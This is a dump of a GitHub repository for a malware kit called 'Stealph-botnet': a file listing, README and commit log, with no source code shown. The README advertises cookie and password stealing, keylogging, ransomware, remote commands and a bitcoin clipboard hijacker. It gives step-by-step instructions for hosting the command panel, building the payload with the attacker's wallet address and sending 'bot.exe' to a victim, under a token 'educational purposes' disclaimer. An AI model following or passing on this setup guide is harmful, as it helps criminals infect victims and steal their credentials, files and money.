======================: FILES :======================
Stealph-botnet
├── builder
│   ├── builder.exe
│   ├── cry.Xdrop
│   ├── death.Xdrop
│   ├── mai.Xdrop
│   ├── ransomware.Xdrop
│   ├── stubbuilder.exe
│   └── tst.Xdrop
├── Capture.PNG
├── config.py
├── README.md
└── web panel
    ├── panel
    │   ├── addbot.php
    │   ├── addcommand.php
    │   ├── cookie.php
    │   ├── coolist.php
    │   ├── css
    │   │   └── term.css
    │   ├── cutlet.php
    │   ├── dead.php
    │   ├── deadtxt.php
    │   ├── hol.php
    │   ├── index.php
    │   ├── injectfile.php
    │   ├── json.php
    │   ├── keylist.php
    │   ├── keylog.php
    │   ├── output.php
    │   ├── pswdgrb.php
    │   ├── pswdlist.php
    │   ├── pussy.php
    │   ├── showkey.php
    │   ├── showrmkey.php
    │   ├── slave.php
    │   ├── sql.php
    │   ├── upload
    │   │   └── index.html
    │   └── upload.php
    └── u251400708_brain.sql

5 directories, 35 files
======================: README CONTENT :======================
# Stealph-botnet

# Requirements:
1.python2.7 installed

# features:
1.Show error massage to victim

2.Download and Run any program

3.change wallpaper

4.RUn shell command

5.Cookie Stealer

6.password Stealer

7.Keylogger

8.Ransomware

9.copy-paste hijacker  (only work when you copy any btc address replace it with attacker btc address)

# how to use:

1 . run config.py file

2 . first go to web panel folder
extract web panel.zip and upload it into use website's public html folder
and now go to phpmyadmin and import u251400708_brain.sql and go back to you files manager public_html folder and open sql.php and add you database infomation;

3 . go to builder folder and execute  stubbuilder.exe
and enter you website url without http
and in second text field add you btc address (dont use user personal btc address)
and click build now go to dist folder recently created you will find a mai.exe.Stealph file  now go back  to your website and uplaod  this in your website and now run builder.exe and and enter you website name click build Xdrop now you will find a bot.exe send this to you victim and enjoy.
# video how to setup:
https://www.youtube.com/watch?v=BK5IoJC9TSc
# Done enjoy!!!
 

![Screenshot](https://github.com/ScRiPt1337/Stealph-botnet/blob/master/Capture.PNG)


its only for educational purposes i am not responsable for any kind of harm and damage

if somethink not working or you facing any problem 
# contact me here : https://discord.gg/5CjQacc !!!
====================== GIT HISTORY: ======================
4c8e83f HEAD@{0}: clone: from https://github.com/ScRiPt1337/Stealph-botnet
commit 4c8e83f13dffe39b79099b02e145ada1b46d13fc
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Tue May 26 19:19:33 2020 +0530

    Update README.md

commit e6552c24f34257832aee6f9a0c68702d979d169c
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Tue Nov 26 22:37:48 2019 +0530

    Update README.md

commit 5d420b8422b650eca1e0cf275a28bd73602f1d25
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Mon Nov 12 23:37:41 2018 +0530

    Update README.md

commit 2db67b623fb6ab94ec72df76ccc7ab3136d0d458
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Mon Nov 12 23:24:18 2018 +0530

    Update README.md

commit 30e6da0c0c74501ae556934a7a06723813b6c602
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Sat Nov 10 23:21:38 2018 +0530

    Update README.md

commit 413e5cb232c6d9d36e0b55600bc2d6a09e4de8f4
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Sat Nov 10 02:48:57 2018 +0530

    Update README.md

commit bb5d633d295ff9045b1efdb8fdef97a3889c4b82
Merge: bcc6091 4cb17cd
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Sat Oct 13 07:31:45 2018 -0700

    Merge branch 'master' of https://github.com/ScRiPt1337/Stealph-botnet

commit bcc60912d8839f8205d8c7264c652a956aed4d05
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Sat Oct 13 07:31:41 2018 -0700

    remove

commit 4cb17cd51b8af9a0444c057f675bd837b9878635
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 10 12:47:52 2018 -0700

    Delete death.spec

commit 7b3a4b3f63f4194aee1165f3e901a710d5ce83ce
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 10 12:46:08 2018 -0700

    btcadswitcherfix

commit fc961bda5c6cffc644cae7e06c97660816f16600
Merge: b7f880b aea400e
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 10 12:37:34 2018 -0700

    Merge branch 'master' of https://github.com/ScRiPt1337/Stealph-botnet

commit b7f880bcbdbd0a91fafd4417d810e3cf25bcf1de
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 10 12:37:30 2018 -0700

    9ioloilo

commit aea400e13c4f3f069e7462e8fdf5f02d31d76ce2
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 10 03:50:15 2018 -0700

    Update config.py

commit 506c91fdd542e1081096b4ed7eb7ea88e655f4fb
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 10 05:42:44 2018 -0400

    Add files via upload

commit 96aa78002b9249430d9b685cc2e45c00c72ed114
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 10 02:42:22 2018 -0700

    Delete ransomware.Xdrop

commit fe0cc03300c54b4af0767c48225795e94251a738
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Sat Oct 6 02:06:21 2018 -0700

    Update README.md

commit d72bfe2c6f76abdab4660c6ecee5cdbe2593655e
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Sat Oct 6 02:06:08 2018 -0700

    Update README.md

commit 644cfc53939cc7b76000c1536207b4ac6611dcc3
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Fri Oct 5 03:22:14 2018 -0700

    fix

commit f06c9920d17f9ea03a4b7398203d609064c9768f
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Fri Oct 5 03:19:59 2018 -0700

    update

commit cb841e81b8f0c0c5907a858811521f9379af4c07
Merge: 7a4cf32 5cb2631
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Fri Oct 5 03:18:15 2018 -0700

    Merge branch 'master' of https://github.com/ScRiPt1337/Stealph-botnet

commit 7a4cf3274a022627e4d4a8f668bfb546003c6602
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Fri Oct 5 03:04:13 2018 -0700

    fix

commit f1220a6a11751b1ae52bcbce5302f93cee9228ee
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Fri Oct 5 02:37:18 2018 -0700

    Update README.md

commit 0f2f1079a26a502fe2350b79cfb66794dbb9d760
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Fri Oct 5 02:37:04 2018 -0700

    Update README.md

commit 988fd95442859c24082f93e0abf7897a3dfaa334
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Thu Oct 4 22:38:43 2018 -0700

    Update README.md

commit 5cb263166273491c61b30c2042914cc1ebd8dc84
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Thu Oct 4 20:16:45 2018 -0700

    Update config.py

commit 45478f63fecd9cce2df0078fa5dd4ca3b8a04971
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Thu Oct 4 16:30:53 2018 -0700

    update

commit e293b2df70ae42607929257044ef1ab5bdd327d2
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Thu Oct 4 16:21:17 2018 -0700

    update

commit 739bc588e8ab5622ffcdd02fa3788422ad7374ba
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Thu Oct 4 16:13:57 2018 -0700

    update

commit 6d77a21e55acbf92229f3ff007434bd150cf5c3f
Merge: fff8906 32bdebc
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Thu Oct 4 16:10:03 2018 -0700

    update

commit fff89067ca6c718f75ad51747fd9e05bb98aad60
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Thu Oct 4 16:08:22 2018 -0700

    update

commit 61ccbac59db27dee6c4e056a57c6917e3920c510
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Thu Oct 4 10:26:57 2018 -0700

    Update README.md

commit e9033761e724ff99703ddaaaf776000e9b8b4fd7
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 10:21:16 2018 -0700

    builder fix

commit 07c410684eed85c91d35293195e3e0937f458866
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 08:54:32 2018 -0700

    hgkj
    
    kg

commit 32bdebc8829e0fec4631b5978fee82918ec367e0
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 06:54:09 2018 -0700

    Update README.md

commit b6462d4a8e47f7480c9985ac0e060d47db19e4c0
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 04:02:44 2018 -0700

    Update README.md

commit 29812eabba9edcd84c0054c09c04a214ce95527f
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 03:36:02 2018 -0700

    Update README.md

commit 65c73c38a980b17669fc34d28e92afb367289b0a
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 03:35:43 2018 -0700

    Update README.md

commit bbbd37b2592227fc353dde4f23c5a0f3dc4455e6
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 10:33:40 2018 -0700

    config

commit 24ef3b7d573ee64ea85daf5ed2b3baa61dfdbd4a
Merge: e903376 2eb66fd
Author: ScRiPt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 10:22:52 2018 -0700

    Merge branch 'master' of https://github.com/ScRiPt1337/Stealph-botnet

commit 2eb66fde97dfc495c54336e074819ac92d4f767b
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 03:03:54 2018 -0700

    Add files via upload

commit c3b3512f5ebe517365533314286fa5458b7fd9a0
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 03:03:24 2018 -0700

    Delete mai.Xdrop

commit 9428d5679a4d865684e74ab25b918549202f42a9
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 02:46:25 2018 -0700

    Update README.md

commit 2292dc5c96336e6ca253eab629fd648ea8989f92
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 02:44:07 2018 -0700

    Update README.md

commit 044392cb2bec471e595661e13584b9baddc8227a
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 02:42:46 2018 -0700

    Update README.md

commit 053dae0efeef502ad985273560e8422a568c2a4e
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 02:41:08 2018 -0700

    Add files via upload

commit c14a496829f8d6523057a41784e8c4381bffcc18
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 01:30:28 2018 -0700

    Add files via upload

commit cc23ed202b4643a858af48e292da37ecc2e3ea4a
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 01:06:15 2018 -0700

    Update README.md

commit d58f2bb69b409f0a7fa8a445f691b0a154997675
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Wed Oct 3 00:52:44 2018 -0700

    Update README.md

commit 2f6be7846a3c3a20444751549579c18b17aec837
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Sat Sep 29 07:42:00 2018 -0700

    Update README.md

commit 3da6cacac27b41e24035cfcdef3d36f115c3e3c0
Author: ScRipt1337 <26287773+ScRiPt1337@users.noreply.github.com>
Date:   Sat Sep 29 07:29:05 2018 -0700

    Create README.md
